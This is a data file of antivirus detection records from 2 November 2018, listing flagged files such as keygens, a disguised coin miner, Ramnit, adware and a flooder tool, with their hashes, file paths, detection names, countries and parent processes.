  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa11124.7596\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$DIa252.7341\\\\\\\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.rar', country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2241752, timestamp='2018-11-02T16:36:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183638-005678dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8518b6c\\AVSCAN-20181102-183627-FE9162CF\\AVSCAN-20181102-183638-005678DC', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:36:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001408-0826af6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0481283\\AVSCAN-20181103-001117-EB3997CA\\AVSCAN-20181103-001408-0826AF6B', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8169902e.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8169902e.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8bcd4d00_8d3d3483.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8bcd4d00_8d3d3483.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-200504-c84859db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1756de49\\AVSCAN-20181102-200451-C59A9FF2\\AVSCAN-20181102-200504-C84859DB', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_946c4e8d_78c73cc2.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_946c4e8d_78c73cc2.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8642ebe2.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8642ebe2.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8bcd4d00_946c4e8d.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8bcd4d00_946c4e8d.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8169902e_840e707b.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8169902e_840e707b.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8d3d3483.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8d3d3483.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8bcd4d00_840e707b.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8bcd4d00_840e707b.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Users\\X\\Downloads\\windows-10-manager-2.3.6\\keygen\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:04:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8642ebe2_840e707b.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8642ebe2_840e707b.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8bcd4d00.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8bcd4d00.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$DRa12244.15493\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T22:10:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='E:\\Programs\\Windows 10 Manager 2.3.3\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T22:11:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nghị định 99.exe', filepath='G:\\\xa0\\NGHỊ ĐỊNH 99.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='05c4a91b676a6f1c6c9d0a9603d1b9a9fa64f8f44098188f92af40e1d9ac751a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\CocCoc\\Browser\\Application\\browser.exe', parentsize=1518968, timestamp='2018-11-02T08:31:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153757-d042e25b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_04797e92\\AVSCAN-20181102-153203-A5222964\\AVSCAN-20181102-153757-D042E25B', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='05c4a91b676a6f1c6c9d0a9603d1b9a9fa64f8f44098188f92af40e1d9ac751a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msvcp80.dll', filepath='C:\\Autodesk\\AUTOCAD+COVADIS\\auto_cad 2008 fr\\x86\\support\\NSA\\Program Files\\NLM\\NLA\\fra\\Windows\\winsxs\\r6hpravq.lm8\\msvcp80.dll', filesize=664000, name='W32/Ramnit.C.#M1.#R1'), hash='05d85422810f2caf6f3d7a68e6cb82f65491a2b906436118ba2458f1c7e040aa', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T06:49:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24250cc1fba06d785e4208efef9280bf81e5e5b7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\24250cc1fba06d785e4208efef9280bf81e5e5b7', filesize=2112000, name='Adware/DealPly.06b94a.#M1.#R1'), hash='06b94ae0fb15a146e28d7b62f083d79de697c9c1d2806a4a7582d54423763e55', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073434-00640873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_221a5b5a\\AVSCAN-20181102-073356-E979216F\\AVSCAN-20181102-073434-00640873', filesize=384000, name='TR/Flooder.384000.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:34:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='overdos.exe', filepath='D:\\DDOS Tools\\OverDoS.exe', filesize=384000, name='HEUR/AGEN.1005124.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T14:24:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06d88b9d01cdb35b3588f9ef1e2488c5ca905f586deb2106ec6cdaa703843752', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-27\\06D88B9D01CDB35B3588F9EF1E2488C5CA905F586DEB2106EC6CDAA703843752', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06d88b9d01cdb35b3588f9ef1e2488c5ca905f586deb2106ec6cdaa703843752', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T22:17:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T22:17:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190240-773a7c9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d5ec04e\\AVSCAN-20181102-185412-19B88F55\\AVSCAN-20181102-190240-773A7C9A', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:36Z'), dt=datetime.date(2018, 11, 2)),
